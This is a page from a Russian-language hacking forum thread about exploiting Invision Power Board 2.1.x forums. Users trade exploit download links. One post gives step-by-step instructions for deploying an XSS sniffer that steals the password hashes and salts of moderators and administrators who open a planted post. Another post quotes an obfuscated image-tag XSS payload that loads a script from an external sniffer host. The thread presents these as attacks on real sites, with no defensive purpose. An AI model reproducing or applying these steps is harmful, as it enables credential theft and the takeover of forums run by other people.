HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Invision Power Board 2.1.7 Exploit
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 30.07.2008, 12:21
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
С нами: 10511126

Репутация: 73
По умолчанию
Цитата:
Сообщение от DDoSька  
Вот тебе решение без геммороя
http://na-s.ru/
пага нереально долго грузится , у тебя нормально сервис работает?
 
Ответить с цитированием

  #12  
Старый 31.07.2008, 05:38
_Sanich
Новичок
Регистрация: 11.02.2008
Сообщений: 12
С нами: 9604342

Репутация: 3
По умолчанию
Цитата:
Сообщение от DDoSька  
Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!
http://www.milw0rm.com/exploits/2010
Последний раз редактировалось _Sanich; 31.07.2008 в 05:44..
 
Ответить с цитированием

  #13  
Старый 24.08.2008, 11:49
PandoraBox
Постоянный
Регистрация: 06.05.2007
Сообщений: 393
С нами: 10008797

Репутация: 398
По умолчанию
Код HTML:
Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/

Открываем ya.js блокнтом, правим путь до host/path/ya.gif , в данном случае пишем http://localhost/sniff/ya.gif, на файл data.txt выставляем права 666.
Затем заходим на xss.php и прописываем полный путь http://localhost/sniff/ya.js и жмем кнопку - попробуй ее не найти она там одна - и получаем код.
Нашим юзером заходим на форум, постим это сообщение и ждем когда его прочитают модеры.
В случае если ктото с модераторскими - или выше - правами зайдет в нашу тему, скрипт получит хеши и соли всего администраторского состава, все это вы можете посмотреть на view.php
www.underwater.itdefence.ru/isniff.rar
www.milw0rm.com/sploits/2008-isniff.rar
Последний раз редактировалось PandoraBox; 24.08.2008 в 11:56..
 
Ответить с цитированием

  #14  
Старый 13.05.2009, 00:50
Менеджер
Новичок
Регистрация: 16.04.2009
Сообщений: 3
С нами: 8984422

Репутация: 0
По умолчанию
Сделал пост.
Не сработало.
Форум изменил код на:
<img src="http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElemen tsByTagName(String.fromCharCode(104,101,97,100)).i tem(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif" border="0" alt="Изображение" />

Форум пропатченный?
Я правильно понимаю, что нужно искать другую уязвимость?
Я новичек.
 
Ответить с цитированием

  #15  
Старый 16.08.2009, 14:48
eNergy
Участник форума
Регистрация: 21.07.2007
Сообщений: 202
С нами: 9899177

Репутация: 93
По умолчанию
перезалейте файл http://www.underwater.itdefence.ru/isniff.rar
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit Rebz Уязвимости CMS / форумов 10 04.05.2009 15:49
Взлом форумов IPB (Invision Power Board) < 2.0.4 Ice_Fro$T Уязвимости CMS / форумов 19 18.11.2006 09:19
Invision Power Board Army System Mod 2.1 SQL Injection Exploit +toxa+ Уязвимости CMS / форумов 10 02.03.2006 19:53
Invision Power Board. SQL injection exploit -SX- Уязвимости CMS / форумов 24 04.06.2005 14:32
Сколько полей в таблице ibf_topics в форуме Invision Power Board 1.3.1? LittleLamer Уязвимости CMS / форумов 2 29.01.2005 03:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.